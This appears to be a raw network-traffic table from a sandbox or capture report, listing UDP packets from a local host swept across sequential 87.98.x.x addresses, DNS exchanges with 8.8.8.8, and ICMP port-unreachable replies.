                                                                                                        Sep 29, 2022 14:45:25.052659035 CEST585676893192.168.2.487.98.179.74
                                                                                                        Sep 29, 2022 14:45:25.052690029 CEST585676893192.168.2.487.98.179.73
                                                                                                        Sep 29, 2022 14:45:25.052772045 CEST585676893192.168.2.487.98.179.75
                                                                                                        Sep 29, 2022 14:45:25.052916050 CEST585676893192.168.2.487.98.179.76
                                                                                                        Sep 29, 2022 14:45:25.053108931 CEST585676893192.168.2.487.98.179.77
                                                                                                        Sep 29, 2022 14:45:25.053225040 CEST585676893192.168.2.487.98.179.78
                                                                                                        Sep 29, 2022 14:45:25.053349018 CEST585676893192.168.2.487.98.179.79
                                                                                                        Sep 29, 2022 14:45:25.053472042 CEST585676893192.168.2.487.98.179.80
                                                                                                        Sep 29, 2022 14:45:25.053606987 CEST585676893192.168.2.487.98.179.81
                                                                                                        Sep 29, 2022 14:45:25.058028936 CEST585676893192.168.2.487.98.179.82
                                                                                                        Sep 29, 2022 14:45:25.058217049 CEST585676893192.168.2.487.98.179.83
                                                                                                        Sep 29, 2022 14:45:25.058506012 CEST585676893192.168.2.487.98.179.84
                                                                                                        Sep 29, 2022 14:45:25.058568954 CEST585676893192.168.2.487.98.179.85
                                                                                                        Sep 29, 2022 14:45:25.058722973 CEST585676893192.168.2.487.98.179.86
                                                                                                        Sep 29, 2022 14:45:25.059113979 CEST585676893192.168.2.487.98.179.87
                                                                                                        Sep 29, 2022 14:45:25.059113979 CEST585676893192.168.2.487.98.179.88
                                                                                                        Sep 29, 2022 14:45:25.059262991 CEST585676893192.168.2.487.98.179.89
                                                                                                        Sep 29, 2022 14:45:25.059447050 CEST585676893192.168.2.487.98.179.90
                                                                                                        Sep 29, 2022 14:45:25.059604883 CEST585676893192.168.2.487.98.179.91
                                                                                                        Sep 29, 2022 14:45:25.059756041 CEST585676893192.168.2.487.98.179.92
                                                                                                        Sep 29, 2022 14:45:25.059927940 CEST585676893192.168.2.487.98.179.93
                                                                                                        Sep 29, 2022 14:45:25.060091019 CEST585676893192.168.2.487.98.179.94
                                                                                                        Sep 29, 2022 14:45:25.060203075 CEST585676893192.168.2.487.98.179.95
                                                                                                        Sep 29, 2022 14:45:25.060329914 CEST585676893192.168.2.487.98.179.96
                                                                                                        Sep 29, 2022 14:45:25.060532093 CEST585676893192.168.2.487.98.179.97
                                                                                                        Sep 29, 2022 14:45:25.060682058 CEST585676893192.168.2.487.98.179.98
                                                                                                        Sep 29, 2022 14:45:25.060852051 CEST585676893192.168.2.487.98.179.99
                                                                                                        Sep 29, 2022 14:45:25.061115980 CEST585676893192.168.2.487.98.179.100
                                                                                                        Sep 29, 2022 14:45:25.061315060 CEST585676893192.168.2.487.98.179.101
                                                                                                        Sep 29, 2022 14:45:25.061502934 CEST585676893192.168.2.487.98.179.102
                                                                                                        Sep 29, 2022 14:45:25.061621904 CEST585676893192.168.2.487.98.179.103
                                                                                                        Sep 29, 2022 14:45:25.061768055 CEST585676893192.168.2.487.98.179.104
                                                                                                        Sep 29, 2022 14:45:25.061949968 CEST585676893192.168.2.487.98.179.105
                                                                                                        Sep 29, 2022 14:45:25.062089920 CEST585676893192.168.2.487.98.179.106
                                                                                                        Sep 29, 2022 14:45:25.062241077 CEST585676893192.168.2.487.98.179.107
                                                                                                        Sep 29, 2022 14:45:25.062395096 CEST585676893192.168.2.487.98.179.108
                                                                                                        Sep 29, 2022 14:45:25.062552929 CEST585676893192.168.2.487.98.179.109
                                                                                                        Sep 29, 2022 14:45:25.062660933 CEST585676893192.168.2.487.98.179.110
                                                                                                        Sep 29, 2022 14:45:25.062772989 CEST585676893192.168.2.487.98.179.111
                                                                                                        Sep 29, 2022 14:45:25.062864065 CEST585676893192.168.2.487.98.179.112
                                                                                                        Sep 29, 2022 14:45:25.062973976 CEST585676893192.168.2.487.98.179.113
                                                                                                        Sep 29, 2022 14:45:25.063070059 CEST585676893192.168.2.487.98.179.114
                                                                                                        Sep 29, 2022 14:45:25.063173056 CEST585676893192.168.2.487.98.179.115
                                                                                                        Sep 29, 2022 14:45:25.063272953 CEST585676893192.168.2.487.98.179.116
                                                                                                        Sep 29, 2022 14:45:25.063369989 CEST585676893192.168.2.487.98.179.117
                                                                                                        Sep 29, 2022 14:45:25.063463926 CEST585676893192.168.2.487.98.179.118
                                                                                                        Sep 29, 2022 14:45:25.063662052 CEST585676893192.168.2.487.98.179.119
                                                                                                        Sep 29, 2022 14:45:25.063662052 CEST585676893192.168.2.487.98.179.120
                                                                                                        Sep 29, 2022 14:45:25.063759089 CEST585676893192.168.2.487.98.179.121
                                                                                                        Sep 29, 2022 14:45:25.063860893 CEST585676893192.168.2.487.98.179.122
                                                                                                        Sep 29, 2022 14:45:25.064059019 CEST585676893192.168.2.487.98.179.124
                                                                                                        Sep 29, 2022 14:45:25.064146042 CEST585676893192.168.2.487.98.179.123
                                                                                                        Sep 29, 2022 14:45:25.064260006 CEST585676893192.168.2.487.98.179.125
                                                                                                        Sep 29, 2022 14:45:25.064480066 CEST585676893192.168.2.487.98.179.126
                                                                                                        Sep 29, 2022 14:45:25.064603090 CEST585676893192.168.2.487.98.179.127
                                                                                                        Sep 29, 2022 14:45:25.064702988 CEST585676893192.168.2.487.98.179.128
                                                                                                        Sep 29, 2022 14:45:25.064810038 CEST585676893192.168.2.487.98.179.129
                                                                                                        Sep 29, 2022 14:45:25.064896107 CEST585676893192.168.2.487.98.179.130
                                                                                                        Sep 29, 2022 14:45:25.064982891 CEST585676893192.168.2.487.98.179.131
                                                                                                        Sep 29, 2022 14:45:25.065227985 CEST585676893192.168.2.487.98.179.133
                                                                                                        Sep 29, 2022 14:45:25.065244913 CEST585676893192.168.2.487.98.179.132
                                                                                                        Sep 29, 2022 14:45:25.065387011 CEST585676893192.168.2.487.98.179.134
                                                                                                        Sep 29, 2022 14:45:25.065501928 CEST585676893192.168.2.487.98.179.135
                                                                                                        Sep 29, 2022 14:45:25.065663099 CEST585676893192.168.2.487.98.179.137
                                                                                                        Sep 29, 2022 14:45:25.065747023 CEST585676893192.168.2.487.98.179.136
                                                                                                        Sep 29, 2022 14:45:25.065787077 CEST585676893192.168.2.487.98.179.138
                                                                                                        Sep 29, 2022 14:45:25.066118956 CEST585676893192.168.2.487.98.179.139
                                                                                                        Sep 29, 2022 14:45:25.066160917 CEST585676893192.168.2.487.98.179.140
                                                                                                        Sep 29, 2022 14:45:25.066342115 CEST585676893192.168.2.487.98.179.141
                                                                                                        Sep 29, 2022 14:45:25.066476107 CEST585676893192.168.2.487.98.179.142
                                                                                                        Sep 29, 2022 14:45:25.066605091 CEST585676893192.168.2.487.98.179.143
                                                                                                        Sep 29, 2022 14:45:25.066739082 CEST585676893192.168.2.487.98.179.144
                                                                                                        Sep 29, 2022 14:45:25.066879988 CEST585676893192.168.2.487.98.179.145
                                                                                                        Sep 29, 2022 14:45:25.066973925 CEST585676893192.168.2.487.98.179.146
                                                                                                        Sep 29, 2022 14:45:25.067075968 CEST585676893192.168.2.487.98.179.147
                                                                                                        Sep 29, 2022 14:45:25.067178011 CEST585676893192.168.2.487.98.179.148
                                                                                                        Sep 29, 2022 14:45:25.067373037 CEST585676893192.168.2.487.98.179.149
                                                                                                        Sep 29, 2022 14:45:25.067404985 CEST585676893192.168.2.487.98.179.150
                                                                                                        Sep 29, 2022 14:45:25.067523003 CEST585676893192.168.2.487.98.179.151
                                                                                                        Sep 29, 2022 14:45:25.067615032 CEST585676893192.168.2.487.98.179.152
                                                                                                        Sep 29, 2022 14:45:25.067764997 CEST585676893192.168.2.487.98.179.153
                                                                                                        Sep 29, 2022 14:45:25.067984104 CEST585676893192.168.2.487.98.179.155
                                                                                                        Sep 29, 2022 14:45:25.068053961 CEST585676893192.168.2.487.98.179.154
                                                                                                        Sep 29, 2022 14:45:25.068151951 CEST585676893192.168.2.487.98.179.156
                                                                                                        Sep 29, 2022 14:45:25.068226099 CEST585676893192.168.2.487.98.179.157
                                                                                                        Sep 29, 2022 14:45:25.068320990 CEST585676893192.168.2.487.98.179.158
                                                                                                        Sep 29, 2022 14:45:25.068416119 CEST585676893192.168.2.487.98.179.159
                                                                                                        Sep 29, 2022 14:45:25.068501949 CEST585676893192.168.2.487.98.179.160
                                                                                                        Sep 29, 2022 14:45:25.068603039 CEST585676893192.168.2.487.98.179.161
                                                                                                        Sep 29, 2022 14:45:25.068722010 CEST585676893192.168.2.487.98.179.162
                                                                                                        Sep 29, 2022 14:45:25.068837881 CEST585676893192.168.2.487.98.179.163
                                                                                                        Sep 29, 2022 14:45:25.069014072 CEST585676893192.168.2.487.98.179.165
                                                                                                        Sep 29, 2022 14:45:25.069077969 CEST585676893192.168.2.487.98.179.164
                                                                                                        Sep 29, 2022 14:45:25.069120884 CEST585676893192.168.2.487.98.179.166
                                                                                                        Sep 29, 2022 14:45:25.069307089 CEST585676893192.168.2.487.98.179.167
                                                                                                        Sep 29, 2022 14:45:25.069546938 CEST585676893192.168.2.487.98.179.169
                                                                                                        Sep 29, 2022 14:45:25.069618940 CEST585676893192.168.2.487.98.179.168
                                                                                                        Sep 29, 2022 14:45:25.069644928 CEST585676893192.168.2.487.98.179.170
                                                                                                        Sep 29, 2022 14:45:25.069875002 CEST585676893192.168.2.487.98.179.172
                                                                                                        Sep 29, 2022 14:45:25.069942951 CEST585676893192.168.2.487.98.179.171
                                                                                                        Sep 29, 2022 14:45:25.069983959 CEST585676893192.168.2.487.98.179.173
                                                                                                        Sep 29, 2022 14:45:25.070113897 CEST585676893192.168.2.487.98.179.174
                                                                                                        Sep 29, 2022 14:45:25.070209026 CEST585676893192.168.2.487.98.179.175
                                                                                                        Sep 29, 2022 14:45:25.070380926 CEST585676893192.168.2.487.98.179.176
                                                                                                        Sep 29, 2022 14:45:25.070472956 CEST585676893192.168.2.487.98.179.177
                                                                                                        Sep 29, 2022 14:45:25.070565939 CEST585676893192.168.2.487.98.179.178
                                                                                                        Sep 29, 2022 14:45:25.070681095 CEST585676893192.168.2.487.98.179.179
                                                                                                        Sep 29, 2022 14:45:25.070751905 CEST585676893192.168.2.487.98.179.180
                                                                                                        Sep 29, 2022 14:45:25.070903063 CEST585676893192.168.2.487.98.179.181
                                                                                                        Sep 29, 2022 14:45:25.070977926 CEST585676893192.168.2.487.98.179.182
                                                                                                        Sep 29, 2022 14:45:25.071049929 CEST585676893192.168.2.487.98.179.183
                                                                                                        Sep 29, 2022 14:45:25.071156025 CEST585676893192.168.2.487.98.179.184
                                                                                                        Sep 29, 2022 14:45:25.071343899 CEST585676893192.168.2.487.98.179.185
                                                                                                        Sep 29, 2022 14:45:25.071537018 CEST585676893192.168.2.487.98.179.187
                                                                                                        Sep 29, 2022 14:45:25.071676970 CEST585676893192.168.2.487.98.179.188
                                                                                                        Sep 29, 2022 14:45:25.071707010 CEST585676893192.168.2.487.98.179.186
                                                                                                        Sep 29, 2022 14:45:25.072419882 CEST585676893192.168.2.487.98.179.189
                                                                                                        Sep 29, 2022 14:45:25.072532892 CEST585676893192.168.2.487.98.179.190
                                                                                                        Sep 29, 2022 14:45:25.072685957 CEST585676893192.168.2.487.98.179.191
                                                                                                        Sep 29, 2022 14:45:25.072756052 CEST585676893192.168.2.487.98.179.192
                                                                                                        Sep 29, 2022 14:45:25.072834969 CEST585676893192.168.2.487.98.179.193
                                                                                                        Sep 29, 2022 14:45:25.072930098 CEST585676893192.168.2.487.98.179.194
                                                                                                        Sep 29, 2022 14:45:25.073143959 CEST585676893192.168.2.487.98.179.195
                                                                                                        Sep 29, 2022 14:45:25.073378086 CEST585676893192.168.2.487.98.179.197
                                                                                                        Sep 29, 2022 14:45:25.073446989 CEST585676893192.168.2.487.98.179.196
                                                                                                        Sep 29, 2022 14:45:25.073496103 CEST585676893192.168.2.487.98.179.198
                                                                                                        Sep 29, 2022 14:45:25.073895931 CEST585676893192.168.2.487.98.179.199
                                                                                                        Sep 29, 2022 14:45:25.075294018 CEST585676893192.168.2.487.98.179.200
                                                                                                        Sep 29, 2022 14:45:25.075489998 CEST585676893192.168.2.487.98.179.201
                                                                                                        Sep 29, 2022 14:45:25.075572968 CEST585676893192.168.2.487.98.179.202
                                                                                                        Sep 29, 2022 14:45:25.075839996 CEST585676893192.168.2.487.98.179.204
                                                                                                        Sep 29, 2022 14:45:25.075889111 CEST585676893192.168.2.487.98.179.203
                                                                                                        Sep 29, 2022 14:45:25.075975895 CEST585676893192.168.2.487.98.179.205
                                                                                                        Sep 29, 2022 14:45:25.076083899 CEST585676893192.168.2.487.98.179.206
                                                                                                        Sep 29, 2022 14:45:25.076200008 CEST585676893192.168.2.487.98.179.207
                                                                                                        Sep 29, 2022 14:45:25.077085972 CEST585676893192.168.2.487.98.179.208
                                                                                                        Sep 29, 2022 14:45:25.077352047 CEST585676893192.168.2.487.98.179.209
                                                                                                        Sep 29, 2022 14:45:25.077481031 CEST585676893192.168.2.487.98.179.210
                                                                                                        Sep 29, 2022 14:45:25.077626944 CEST585676893192.168.2.487.98.179.211
                                                                                                        Sep 29, 2022 14:45:25.077733040 CEST585676893192.168.2.487.98.179.212
                                                                                                        Sep 29, 2022 14:45:25.078027964 CEST585676893192.168.2.487.98.179.213
                                                                                                        Sep 29, 2022 14:45:25.078031063 CEST585676893192.168.2.487.98.179.214
                                                                                                        Sep 29, 2022 14:45:25.078089952 CEST585676893192.168.2.487.98.179.215
                                                                                                        Sep 29, 2022 14:45:25.078205109 CEST585676893192.168.2.487.98.179.216
                                                                                                        Sep 29, 2022 14:45:25.078336000 CEST585676893192.168.2.487.98.179.217
                                                                                                        Sep 29, 2022 14:45:25.078555107 CEST585676893192.168.2.487.98.179.219
                                                                                                        Sep 29, 2022 14:45:25.078623056 CEST585676893192.168.2.487.98.179.218
                                                                                                        Sep 29, 2022 14:45:25.078681946 CEST585676893192.168.2.487.98.179.220
                                                                                                        Sep 29, 2022 14:45:25.078787088 CEST585676893192.168.2.487.98.179.221
                                                                                                        Sep 29, 2022 14:45:25.078902006 CEST585676893192.168.2.487.98.179.222
                                                                                                        Sep 29, 2022 14:45:25.079034090 CEST585676893192.168.2.487.98.179.223
                                                                                                        Sep 29, 2022 14:45:25.079174042 CEST585676893192.168.2.487.98.179.224
                                                                                                        Sep 29, 2022 14:45:25.079350948 CEST585676893192.168.2.487.98.179.226
                                                                                                        Sep 29, 2022 14:45:25.079353094 CEST585676893192.168.2.487.98.179.225
                                                                                                        Sep 29, 2022 14:45:25.079432011 CEST585676893192.168.2.487.98.179.227
                                                                                                        Sep 29, 2022 14:45:25.079653025 CEST585676893192.168.2.487.98.179.229
                                                                                                        Sep 29, 2022 14:45:25.079780102 CEST585676893192.168.2.487.98.179.230
                                                                                                        Sep 29, 2022 14:45:25.079967976 CEST585676893192.168.2.487.98.179.231
                                                                                                        Sep 29, 2022 14:45:25.079967976 CEST585676893192.168.2.487.98.179.232
                                                                                                        Sep 29, 2022 14:45:25.080008984 CEST585676893192.168.2.487.98.179.228
                                                                                                        Sep 29, 2022 14:45:25.080060959 CEST585676893192.168.2.487.98.179.233
                                                                                                        Sep 29, 2022 14:45:25.080178976 CEST585676893192.168.2.487.98.179.234
                                                                                                        Sep 29, 2022 14:45:25.080388069 CEST585676893192.168.2.487.98.179.236
                                                                                                        Sep 29, 2022 14:45:25.080400944 CEST585676893192.168.2.487.98.179.235
                                                                                                        Sep 29, 2022 14:45:25.080513000 CEST585676893192.168.2.487.98.179.237
                                                                                                        Sep 29, 2022 14:45:25.080672026 CEST585676893192.168.2.487.98.179.239
                                                                                                        Sep 29, 2022 14:45:25.080681086 CEST585676893192.168.2.487.98.179.238
                                                                                                        Sep 29, 2022 14:45:25.080785990 CEST585676893192.168.2.487.98.179.240
                                                                                                        Sep 29, 2022 14:45:25.080899954 CEST585676893192.168.2.487.98.179.241
                                                                                                        Sep 29, 2022 14:45:25.080991030 CEST585676893192.168.2.487.98.179.242
                                                                                                        Sep 29, 2022 14:45:25.081168890 CEST585676893192.168.2.487.98.179.243
                                                                                                        Sep 29, 2022 14:45:25.081281900 CEST585676893192.168.2.487.98.179.244
                                                                                                        Sep 29, 2022 14:45:25.081496954 CEST585676893192.168.2.487.98.179.246
                                                                                                        Sep 29, 2022 14:45:25.081617117 CEST585676893192.168.2.487.98.179.247
                                                                                                        Sep 29, 2022 14:45:25.081703901 CEST585676893192.168.2.487.98.179.245
                                                                                                        Sep 29, 2022 14:45:25.081754923 CEST585676893192.168.2.487.98.179.248
                                                                                                        Sep 29, 2022 14:45:25.082056046 CEST585676893192.168.2.487.98.179.251
                                                                                                        Sep 29, 2022 14:45:25.082077980 CEST585676893192.168.2.487.98.179.250
                                                                                                        Sep 29, 2022 14:45:25.082127094 CEST585676893192.168.2.487.98.179.249
                                                                                                        Sep 29, 2022 14:45:25.082256079 CEST585676893192.168.2.487.98.179.252
                                                                                                        Sep 29, 2022 14:45:25.082346916 CEST585676893192.168.2.487.98.179.253
                                                                                                        Sep 29, 2022 14:45:25.082449913 CEST585676893192.168.2.487.98.179.254
                                                                                                        Sep 29, 2022 14:45:26.114461899 CEST585676893192.168.2.487.98.179.255
                                                                                                        Sep 29, 2022 14:45:39.559165001 CEST5223953192.168.2.48.8.8.8
                                                                                                        Sep 29, 2022 14:45:39.578609943 CEST53522398.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:45:41.002249002 CEST5680753192.168.2.48.8.8.8
                                                                                                        Sep 29, 2022 14:45:41.021670103 CEST53568078.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:45:44.980917931 CEST6100753192.168.2.48.8.8.8
                                                                                                        Sep 29, 2022 14:45:45.002080917 CEST53610078.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:45:58.916284084 CEST6068653192.168.2.48.8.8.8
                                                                                                        Sep 29, 2022 14:45:59.107394934 CEST53606868.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:45:59.113996029 CEST6112453192.168.2.48.8.8.8
                                                                                                        Sep 29, 2022 14:45:59.131458044 CEST53611248.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:45:59.236999035 CEST5944453192.168.2.48.8.8.8
                                                                                                        Sep 29, 2022 14:45:59.256238937 CEST53594448.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:46:36.940516949 CEST5602253192.168.2.48.8.8.8
                                                                                                        Sep 29, 2022 14:46:36.959197044 CEST53560228.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:46:37.088084936 CEST6082253192.168.2.48.8.8.8
                                                                                                        Sep 29, 2022 14:46:37.109461069 CEST53608228.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:46:46.194776058 CEST53497508.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:46:46.196552038 CEST53605508.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:46:46.310127020 CEST53548518.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:46:46.334012032 CEST53573008.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:46:57.918495893 CEST53589148.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:46:58.491111994 CEST53514198.8.8.8192.168.2.4
                                                                                                        Sep 29, 2022 14:46:58.618309975 CEST53510548.8.8.8192.168.2.4
                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                        Sep 29, 2022 14:45:15.569505930 CEST87.98.176.34192.168.2.4c759(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.569536924 CEST87.98.176.39192.168.2.4c765(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.573682070 CEST87.98.176.9192.168.2.4c747(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.573996067 CEST87.98.176.1192.168.2.4c73f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.574026108 CEST87.98.176.14192.168.2.4c745(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.574322939 CEST87.98.176.15192.168.2.4c74d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.574352980 CEST87.98.176.11192.168.2.4c749(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.574462891 CEST87.98.176.7192.168.2.4c745(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.574541092 CEST87.98.176.8192.168.2.4c746(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.574708939 CEST87.98.176.10192.168.2.4c748(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.575097084 CEST87.98.176.16192.168.2.4c74e(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.575846910 CEST87.98.176.17192.168.2.4c74f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.576683998 CEST87.98.176.25192.168.2.4c757(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.576762915 CEST87.98.176.24192.168.2.4c756(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.576904058 CEST87.98.176.33192.168.2.4c75f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.577009916 CEST87.98.176.35192.168.2.4c761(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.577454090 CEST87.98.176.27192.168.2.4c759(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.577492952 CEST87.98.176.38192.168.2.4c764(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.599030972 CEST87.98.176.42192.168.2.4c768(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.599050999 CEST87.98.176.90192.168.2.4c798(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.601715088 CEST87.98.176.53192.168.2.4c773(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.601731062 CEST87.98.176.55192.168.2.4c775(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.602087021 CEST87.98.176.58192.168.2.4c778(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.604470968 CEST87.98.176.74192.168.2.4c788(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.606509924 CEST87.98.176.82192.168.2.4c790(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.606542110 CEST87.98.176.85192.168.2.4c793(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.607228994 CEST87.98.176.83192.168.2.4c791(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.607584953 CEST87.98.176.99192.168.2.4c7a1(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.608063936 CEST87.98.176.92192.168.2.4c793(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.608644962 CEST87.98.176.151192.168.2.4c7d5(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.608690023 CEST87.98.176.113192.168.2.4c7af(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.608964920 CEST87.98.176.114192.168.2.4c7b0(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.608989954 CEST87.98.176.110192.168.2.4c7ac(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.609632969 CEST87.98.176.116192.168.2.4c7b2(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.609658003 CEST87.98.176.117192.168.2.4c7ac(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.612283945 CEST87.98.176.122192.168.2.4c7b8(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.612596989 CEST87.98.176.130192.168.2.4c7c0(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.612960100 CEST87.98.176.124192.168.2.4c7ba(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.614288092 CEST87.98.176.142192.168.2.4c7cc(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.615395069 CEST87.98.176.190192.168.2.4c7fc(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.616447926 CEST87.98.176.156192.168.2.4c7da(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.616766930 CEST87.98.176.150192.168.2.4c7d4(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.616993904 CEST87.98.176.200192.168.2.4c806(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.617177963 CEST87.98.176.158192.168.2.4c7dc(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.617523909 CEST87.98.176.164192.168.2.4c7e2(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.617546082 CEST87.98.176.147192.168.2.4c7d1(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.618392944 CEST87.98.176.215192.168.2.4c815(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.618931055 CEST87.98.176.163192.168.2.4c7e1(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.618953943 CEST87.98.176.171192.168.2.4c7e9(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.619230032 CEST87.98.176.169192.168.2.4c7e7(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.620811939 CEST87.98.176.221192.168.2.4c81b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.620836020 CEST87.98.176.185192.168.2.4c7f7(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.620858908 CEST87.98.176.178192.168.2.4c7f0(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.622293949 CEST87.98.176.184192.168.2.4c7f6(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.624190092 CEST87.98.176.196192.168.2.4c802(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.624222040 CEST87.98.176.193192.168.2.4c7ff(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.625065088 CEST87.98.176.203192.168.2.4c809(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.625088930 CEST87.98.176.206192.168.2.4c80c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.625427008 CEST87.98.176.210192.168.2.4c810(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.625617027 CEST87.98.176.195192.168.2.4c801(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.626976013 CEST87.98.176.102192.168.2.4c79d(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.627949953 CEST87.98.176.219192.168.2.4c819(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.628458023 CEST87.98.176.224192.168.2.4c81e(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.628554106 CEST87.98.176.220192.168.2.4c81a(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.629192114 CEST87.98.176.225192.168.2.4c81f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.629215002 CEST87.98.176.227192.168.2.4c817(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.642324924 CEST87.98.176.234192.168.2.4c828(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.644269943 CEST87.98.176.236192.168.2.4c82a(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.644335032 CEST87.98.176.239192.168.2.4c82d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.645087004 CEST87.98.176.241192.168.2.4c82f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.645140886 CEST87.98.176.243192.168.2.4c82a(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.645180941 CEST87.98.176.248192.168.2.4c836(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.645220041 CEST87.98.176.242192.168.2.4c830(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.645260096 CEST87.98.176.246192.168.2.4c82d(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.654777050 CEST87.98.176.254192.168.2.4c83c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:15.657586098 CEST192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.661673069 CEST87.98.177.47192.168.2.4c86d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.664513111 CEST87.98.177.4192.168.2.4c842(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.664997101 CEST87.98.177.9192.168.2.4c847(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.665018082 CEST87.98.177.13192.168.2.4c84b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.665716887 CEST87.98.177.6192.168.2.4c844(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.665740013 CEST87.98.177.21192.168.2.4c853(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.666469097 CEST87.98.177.20192.168.2.4c852(Port unreachable)Destination Unreachable
